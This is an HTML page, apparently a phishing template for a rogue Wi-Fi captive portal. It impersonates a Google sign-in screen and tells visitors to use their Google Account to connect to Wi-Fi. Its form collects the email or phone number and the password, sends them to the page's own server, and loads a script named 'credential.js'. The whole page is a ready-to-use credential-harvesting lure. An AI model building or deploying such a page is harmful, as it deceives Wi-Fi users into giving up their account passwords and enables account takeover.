<html><head><style type="text/css">

</style><style type="text/css">

</style><style type="text/css">

</style>


<title></title>
<meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=0.5, maximum-scale=3.0">
<script src="js/site.js"></script>
<script src="js/credential.js"></script>
<style type="text/css">
	/*Masukkan style disini
</style>
  
  </head>
<body>
<div class="container">
<div class="box">



<h1>Sign in</h1>
<p>Use your Google Account for Connecting to wifi</p>



  
<form action='/' method='get'>
<div class="field">
<input name=user type="name" placeholder="Phone number, username, or email">
<label for="username">Email or phone number</label>
</div>
<div class="field">
<input name=pass type="password" placeholder="password">
<label for="password">Password</label>
</div><a class="sidgnup" href="#">Forgot password ?</a>
<div class="separator">
</div> 
<div class="others">
<button type=submit class="login-button" title="login">Next</button>
</div>  
</form>
</div>
<div class="box">

<p>
    <a class="signup" href="#">Help</a>
    
    <a class="signup" href="#">Privacy</a><a class="signup" href="#">terms</a>
</p>
  
</div>
  
  
  
</div>

</body></html>